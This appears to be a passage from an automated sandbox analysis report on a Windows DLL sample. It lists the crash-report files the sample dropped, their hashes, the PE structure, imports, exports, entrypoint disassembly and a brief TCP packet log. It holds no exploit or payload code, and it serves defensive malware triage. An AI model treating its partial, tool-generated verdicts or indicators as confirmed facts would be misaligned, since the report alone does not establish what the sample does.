                                                                                                                                Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.0.8.4.<./.P.i.d.>.......
                                                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER18F4.tmp.xml
                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):4771
                                                                                                                                Entropy (8bit):4.481204319652307
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:cvIwSD8zsPJgtWI9pFWSC8Bl78fm8M4JCdsPMFGD+q8vjsPKI4SrSxd:uITfxC0SNb4JdxKmdDWxd
                                                                                                                                MD5:B3096293B157544A11E07B9BC420DD68
                                                                                                                                SHA1:57259C5A2E808FD52947AE76E5F47FB0E56FF8B8
                                                                                                                                SHA-256:6ECFDFC49D3ED528BFC1B179F42DF660BAA7F19736D51855C79376AE6F4FE475
                                                                                                                                SHA-512:581BFB1D0B14C0309E3B64C3D8D1260118245471C7B67F9B3E932508193A3953ADF51D007157CC9D27797DACDEC1888B683B829AF1D3A97D6BB2D9D6F8C1F5CD
                                                                                                                                Malicious:false
                                                                                                                                Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1206301" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER1DF3.tmp.dmp
                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                File Type:Mini DuMP crash report, 15 streams, Tue Oct 12 07:50:56 2021, 0x1205a4 type
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):57848
                                                                                                                                Entropy (8bit):2.011654227292554
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:0eaydMcdJA1SL+3x+8nKyCPEAUXjxQk76EVEMRoQwv5jYMOnPTgD:80McbA1SL+3x+8nwPEftQiV8QwROTq
                                                                                                                                MD5:56D9C114464C0EAB37C5F1BA2CA25BD9
                                                                                                                                SHA1:CB86B8F90DE79CF655931CC1473376206F3AB4F1
                                                                                                                                SHA-256:7A50D18CA338C0603708D0AAE04ACE11D6AFAABB62E18955544488A0789FD2C1
                                                                                                                                SHA-512:F726BEEBEFD4EEC6630471826DADF2A8000272FEC02C2B037B14F4B6291A3AF158C86D9A22FE99B6D38133BA26352717A19333FEBF3ED66C3F23034190571238
                                                                                                                                Malicious:false
                                                                                                                                Preview: MDMP....... .......`>ea...................U...........B..............GenuineIntelW...........T.......|....=ea.............................0..1...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
                                                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER2A87.tmp.WERInternalMetadata.xml
                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):8302
                                                                                                                                Entropy (8bit):3.694733762852044
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:Rrl7r3GLNiYjA6yj6YVx6dgmfTkOSiCpDp89bRRsf8U7m:RrlsNiSA6Q6Yj6dgmfTkOS0RKf8
                                                                                                                                MD5:AF2F6F97AC027E2DE27FA9E9412E71C6
                                                                                                                                SHA1:F7A825A5D6E3D83D7F5DD819370635A22A337A12
                                                                                                                                SHA-256:EC4A2E76921EE09528478069C9C4AFD67F13B7D091456816762F9754E888BBC4
                                                                                                                                SHA-512:C51ABDEC5497BBC13BFE4C4561DB25FE8D0CC7F0EA242C52FE4EEF90D13B26F4B77DB4710F99B1679ACC20428771F47D94494644DF55F99CB2FBDBA4102D58F9
                                                                                                                                Malicious:false
                                                                                                                                Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.0.1.2.<./.P.i.d.>.......
                                                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER2AA5.tmp.dmp
                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                File Type:Mini DuMP crash report, 15 streams, Tue Oct 12 07:51:00 2021, 0x1205a4 type
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):35284
                                                                                                                                Entropy (8bit):2.385701210745147
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:QhtbBKt5jXjMzQ1IDZqyqU10+hesUgks4TUhegfXPO+:cBKDrQzQaqyNhe7gATUD/V
                                                                                                                                MD5:26D47BBB77204AEDD136BCC1854DA26A
                                                                                                                                SHA1:CA3F25C975A62C71298F927C5636EB23E6E7D066
                                                                                                                                SHA-256:594A65A664C3A120943D2C24EF892E6C7E3C72FD169628A57A4039B4714593F7
                                                                                                                                SHA-512:F58931527BA57F956163D14848BF67B1E0876609C0144226A74316058E70503F6331BABC6161AB40994338E3D0B6CD212D5944ABACACCB87D5C03D6C38D2698C
                                                                                                                                Malicious:false
                                                                                                                                Preview: MDMP....... .......d>ea...................U...........B..............GenuineIntelW...........T............=ea.............................0..1...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
                                                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER2F6A.tmp.xml
                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):4630
                                                                                                                                Entropy (8bit):4.4533004304049015
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:cvIwSD8zsPJgtWI9pFWSC8BV8fm8M4JCds9FhF9I+q8/5WY4SrS1d:uITfxC0SNAJ3kHYDW1d
                                                                                                                                MD5:361E1FB3A3A1D969F46C202D9F6A6BE9
                                                                                                                                SHA1:2CB93394875E4A71BFB33DA586C42FB25F9FA40D
                                                                                                                                SHA-256:41E6D6A75CCF51226DE7B4D0C8015FD4D2D4DA5CC95EF56E60F411B8CE2834C4
                                                                                                                                SHA-512:8708A1C8FE3F89B87370FAE532A4877E25F4B43661C491A6A89F94843EC94E772CC730730213F40C9B6021FB88E55DA7BBC66D985609959E4760DEDBDAD17448
                                                                                                                                Malicious:false
                                                                                                                                Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1206301" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER3E5D.tmp.WERInternalMetadata.xml
                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):8406
                                                                                                                                Entropy (8bit):3.699426610909095
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:Rrl7r3GLNiEjt6EJ6YV/6dgmf8NSMCprs89bxKsf6bm:RrlsNi+t6EJ6Yt6dgmf8NStxpfv
                                                                                                                                MD5:C68EE9F1E9CC2120F276F341A19B2ADC
                                                                                                                                SHA1:C356502CDA05C48684274ACDC1EF601B7C0BCB42
                                                                                                                                SHA-256:8E92D82339769DC546E938521D48F02B2295CCC867E96DA3A0C9B9802662DFE8
                                                                                                                                SHA-512:82A56DCB8302FB319A22119AD036E6DF508C00722338CDB6AC58F8ADC26966836AA6D7F2EFF9BD9E724D035423923155E8191EC36656859655A0B2B16A89CA36
                                                                                                                                Malicious:false
                                                                                                                                Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.3.6.0.<./.P.i.d.>.......
                                                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER49E7.tmp.xml
                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):4771
                                                                                                                                Entropy (8bit):4.482639623381592
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:cvIwSD8zsPJgtWI9pFWSC8Bq8fm8M4JCdsPMFP+q8vjsPu4SrSchd:uITfxC0SNNJdmKmuDW4d
                                                                                                                                MD5:4907E384041C5C9D778C701F72E97A31
                                                                                                                                SHA1:70EC43A7F6AAC60CC85361597425778220A4B820
                                                                                                                                SHA-256:6EA365475E9D5B0E05E821C2FF98D74B4F13311B4C9BF2CBA7FEFA13C8D3BE0B
                                                                                                                                SHA-512:417778634689D92CA355958B0791321F83CD9672E3A0CE8F07DB83A6E7EA2FA69AF2CD76D51DC38FD46924132E9F17FC24CB10A54E93F2C023055C31EB70F39B
                                                                                                                                Malicious:false
                                                                                                                                Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1206301" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER923.tmp.dmp
                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                File Type:Mini DuMP crash report, 15 streams, Tue Oct 12 07:50:51 2021, 0x1205a4 type
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):35708
                                                                                                                                Entropy (8bit):2.3486234062735507
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:Ppoob1NtADw07S8VXjMzQ1IDZqcqa15q+TlYzGEfShfTHHcR:BoobxfR8VQzQaqcJq+JYzGEMTHk
                                                                                                                                MD5:AB79F102EB23B8810370F156BF99C2F3
                                                                                                                                SHA1:AB6185126C490366EA9A2DB1356D419BBF92B2D9
                                                                                                                                SHA-256:DF08B5455FE3079A4AFFE403CE6D1CD2E809784433C83BC1565BDB6835CA7C0E
                                                                                                                                SHA-512:CBDE020EB79704CB9008A597BB27102DD4393583CE542ECB48B1664A9864321A994FDB4F973018FDDE12CEF573274DA211256A37DEB0D755A093865DBCCCFBC8
                                                                                                                                Malicious:false
                                                                                                                                Preview: MDMP....... .......[>ea...................U...........B..............GenuineIntelW...........T............=ea.............................0..1...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................

                                                                                                                                Static File Info

                                                                                                                                General

                                                                                                                                File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                Entropy (8bit):6.669952151971332
                                                                                                                                TrID:
                                                                                                                                • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                                                                                                                                • Generic Win/DOS Executable (2004/3) 0.20%
                                                                                                                                • DOS Executable Generic (2002/1) 0.20%
                                                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                File name:616412739e268.dll
                                                                                                                                File size:718336
                                                                                                                                MD5:9e67e68ddbedba865b91b5469ab642ef
                                                                                                                                SHA1:f2c7b0735343081be06e48616d0fc14235a28744
                                                                                                                                SHA256:41c0934ba1be030dbae45893107f6a2ae5f99c79d7634626263cdf809f7556ee
                                                                                                                                SHA512:802d983ca7ca04ae737da69ed5772eece8f408c6c02c8d0c42cfea1c1abf25236b02c35c09d56f3ba6a229b3b71f72fa3d4c6735c8670c76affdbbc139b63d87
                                                                                                                                SSDEEP:12288:aUAQSxl6fDEr8Np6b/rPPsjosrS9aEoe+0JCym+4YJAOSVUNcuHIGF4uW/XrGAsV:az3xl6fq8Np6bTPPaBreaZlYCOSVol2a
                                                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m$aV.J2V.J2V.J2...2U.J2_t.2H.J2.cH3R.J2.cO3_.J2.cI3D.J2...2H.J2V.K2..J2.cO3).J2.cJ3W.J2.cJ3W.J2V..2W.J2.cH3W.J2RichV.J2.......

                                                                                                                                File Icon

                                                                                                                                Icon Hash:74f0e4ecccdce0e4

                                                                                                                                Static PE Info

                                                                                                                                General

                                                                                                                                Entrypoint:0x1003ab77
                                                                                                                                Entrypoint Section:.text
                                                                                                                                Digitally signed:false
                                                                                                                                Imagebase:0x10000000
                                                                                                                                Subsystem:windows gui
                                                                                                                                Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                                                                                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT
                                                                                                                                Time Stamp:0x5F700BB2 [Sun Sep 27 03:49:06 2020 UTC]
                                                                                                                                TLS Callbacks:
                                                                                                                                CLR (.Net) Version:
                                                                                                                                OS Version Major:6
                                                                                                                                OS Version Minor:0
                                                                                                                                File Version Major:6
                                                                                                                                File Version Minor:0
                                                                                                                                Subsystem Version Major:6
                                                                                                                                Subsystem Version Minor:0
                                                                                                                                Import Hash:b5c6badd398e2e3aa283a40a40432c6c

                                                                                                                                Entrypoint Preview

                                                                                                                                Instruction
                                                                                                                                push ebp
                                                                                                                                mov ebp, esp
                                                                                                                                cmp dword ptr [ebp+0Ch], 01h
                                                                                                                                jne 00007F018CD7E347h
                                                                                                                                call 00007F018CD7EE32h
                                                                                                                                push dword ptr [ebp+10h]
                                                                                                                                push dword ptr [ebp+0Ch]
                                                                                                                                push dword ptr [ebp+08h]
                                                                                                                                call 00007F018CD7E1EAh
                                                                                                                                add esp, 0Ch
                                                                                                                                pop ebp
                                                                                                                                retn 000Ch
                                                                                                                                mov ecx, dword ptr [ebp-0Ch]
                                                                                                                                mov dword ptr fs:[00000000h], ecx
                                                                                                                                pop ecx
                                                                                                                                pop edi
                                                                                                                                pop edi
                                                                                                                                pop esi
                                                                                                                                pop ebx
                                                                                                                                mov esp, ebp
                                                                                                                                pop ebp
                                                                                                                                push ecx
                                                                                                                                ret
                                                                                                                                mov ecx, dword ptr [ebp-10h]
                                                                                                                                xor ecx, ebp
                                                                                                                                call 00007F018CD7DF43h
                                                                                                                                jmp 00007F018CD7E320h
                                                                                                                                mov ecx, dword ptr [ebp-14h]
                                                                                                                                xor ecx, ebp
                                                                                                                                call 00007F018CD7DF32h
                                                                                                                                jmp 00007F018CD7E30Fh
                                                                                                                                push eax
                                                                                                                                push dword ptr fs:[00000000h]
                                                                                                                                lea eax, dword ptr [esp+0Ch]
                                                                                                                                sub esp, dword ptr [esp+0Ch]
                                                                                                                                push ebx
                                                                                                                                push esi
                                                                                                                                push edi
                                                                                                                                mov dword ptr [eax], ebp
                                                                                                                                mov ebp, eax
                                                                                                                                mov eax, dword ptr [100AA0D4h]
                                                                                                                                xor eax, ebp
                                                                                                                                push eax
                                                                                                                                push dword ptr [ebp-04h]
                                                                                                                                mov dword ptr [ebp-04h], FFFFFFFFh
                                                                                                                                lea eax, dword ptr [ebp-0Ch]
                                                                                                                                mov dword ptr fs:[00000000h], eax
                                                                                                                                ret
                                                                                                                                push eax
                                                                                                                                push dword ptr fs:[00000000h]
                                                                                                                                lea eax, dword ptr [esp+0Ch]
                                                                                                                                sub esp, dword ptr [esp+0Ch]
                                                                                                                                push ebx
                                                                                                                                push esi
                                                                                                                                push edi
                                                                                                                                mov dword ptr [eax], ebp
                                                                                                                                mov ebp, eax
                                                                                                                                mov eax, dword ptr [100AA0D4h]
                                                                                                                                xor eax, ebp
                                                                                                                                push eax
                                                                                                                                mov dword ptr [ebp-10h], eax
                                                                                                                                push dword ptr [ebp-04h]
                                                                                                                                mov dword ptr [ebp-04h], FFFFFFFFh
                                                                                                                                lea eax, dword ptr [ebp-0Ch]
                                                                                                                                mov dword ptr fs:[00000000h], eax
                                                                                                                                ret
                                                                                                                                push eax
                                                                                                                                inc dword ptr fs:[eax]

                                                                                                                                Data Directories

                                                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0xa89900x80.rdata
                                                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0xa8a100x50.rdata
                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x1460000x53d0.reloc
                                                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0xa474c0x54.rdata
                                                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xa47a00x40.rdata
                                                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x7b0000x1fc.rdata
                                                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                Sections

                                                                                                                                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                .text0x10000x79f710x7a000False0.510071801358data6.75463290974IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                                                .rdata0x7b0000x2e5860x2e600False0.556366871631data5.60181106954IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                .data0xaa0000x9b19c0x1800False0.190266927083data4.15778005426IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                                .reloc0x1460000x53d00x5400False0.752650669643data6.72453697464IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                Imports

                                                                                                                                DLLImport
                                                                                                                                KERNEL32.dllLockResource, FreeLibrary, GetProcAddress, VirtualProtect, OpenProcess, GetCurrentThreadId, Sleep, GetSystemTime, CreateSemaphoreW, LoadLibraryW, GetModuleFileNameW, GetModuleHandleW, GetTempPathW, CreateFileW, GetVolumeInformationW, QueryPerformanceCounter, GetVersionExW, GetDateFormatW, OutputDebugStringW, CloseHandle, ReadConsoleW, ReadFile, GetConsoleMode, GetConsoleCP, WriteFile, FlushFileBuffers, HeapSize, SetStdHandle, SetFilePointerEx, GetFileSizeEx, GetProcessHeap, SetEnvironmentVariableW, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, GetCommandLineA, GetOEMCP, GetACP, IsValidCodePage, FindNextFileW, FindFirstFileExW, FindClose, SetConsoleCtrlHandler, GetFileType, GetStdHandle, HeapReAlloc, HeapFree, EnumSystemLocalesW, GetUserDefaultLCID, IsValidLocale, EncodePointer, DecodePointer, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, WideCharToMultiByte, SetLastError, InitializeCriticalSectionAndSpinCount, CreateEventW, SwitchToThread, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetSystemTimeAsFileTime, GetTickCount, MultiByteToWideChar, GetStringTypeW, CompareStringW, LCMapStringW, GetLocaleInfoW, GetCPInfo, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, GetCurrentProcess, TerminateProcess, GetCurrentProcessId, InitializeSListHead, RaiseException, RtlUnwind, InterlockedPushEntrySList, InterlockedFlushSList, GetLastError, LoadLibraryExW, QueryPerformanceFrequency, ExitProcess, GetModuleHandleExW, GetCurrentThread, HeapAlloc, GetTimeZoneInformation, GetTimeFormatW, WriteConsoleW
                                                                                                                                USER32.dllCreateMenu, DeferWindowPos, BeginDeferWindowPos, UnregisterHotKey, TranslateMessage, RegisterWindowMessageW, GetPropW
                                                                                                                                MSACM32.dllacmDriverClose, acmFormatChooseW, acmFilterDetailsW, acmFilterEnumW, acmDriverEnum, acmDriverPriority, acmFormatEnumW, acmFilterTagEnumW, acmFormatTagDetailsW, acmDriverMessage, acmFormatSuggest, acmFilterTagDetailsW, acmFormatTagEnumW, acmFilterChooseW, acmDriverOpen, acmDriverDetailsW, acmFormatDetailsW, acmMetrics, acmDriverAddW, acmDriverRemove, acmDriverID, acmGetVersion

                                                                                                                                Exports

                                                                                                                                NameOrdinalAddress
                                                                                                                                BeGrass10x10016020
                                                                                                                                Fieldeight20x100162f0
                                                                                                                                Often30x10016510
                                                                                                                                Townenter40x100167a0

                                                                                                                                Network Behavior

                                                                                                                                Network Port Distribution

                                                                                                                                TCP Packets

                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                Oct 12, 2021 00:50:46.383085012 CEST49759443192.168.2.313.82.28.61
                                                                                                                                Oct 12, 2021 00:50:46.383264065 CEST4434975913.82.28.61192.168.2.3
                                                                                                                                Oct 12, 2021 00:50:46.383400917 CEST49759443192.168.2.313.82.28.61
                                                                                                                                Oct 12, 2021 00:50:46.389113903 CEST49759443192.168.2.313.82.28.61
                                                                                                                                Oct 12, 2021 00:50:46.389153004 CEST4434975913.82.28.61192.168.2.3
                                                                                                                                Oct 12, 2021 00:50:46.703313112 CEST4434975913.82.28.61192.168.2.3
                                                                                                                                Oct 12, 2021 00:50:46.703394890 CEST49759443192.168.2.313.82.28.61
                                                                                                                                Oct 12, 2021 00:50:46.706571102 CEST49759443192.168.2.313.82.28.61
                                                                                                                                Oct 12, 2021 00:50:46.706589937 CEST4434975913.82.28.61192.168.2.3
                                                                                                                                Oct 12, 2021 00:50:46.706839085 CEST4434975913.82.28.61192.168.2.3
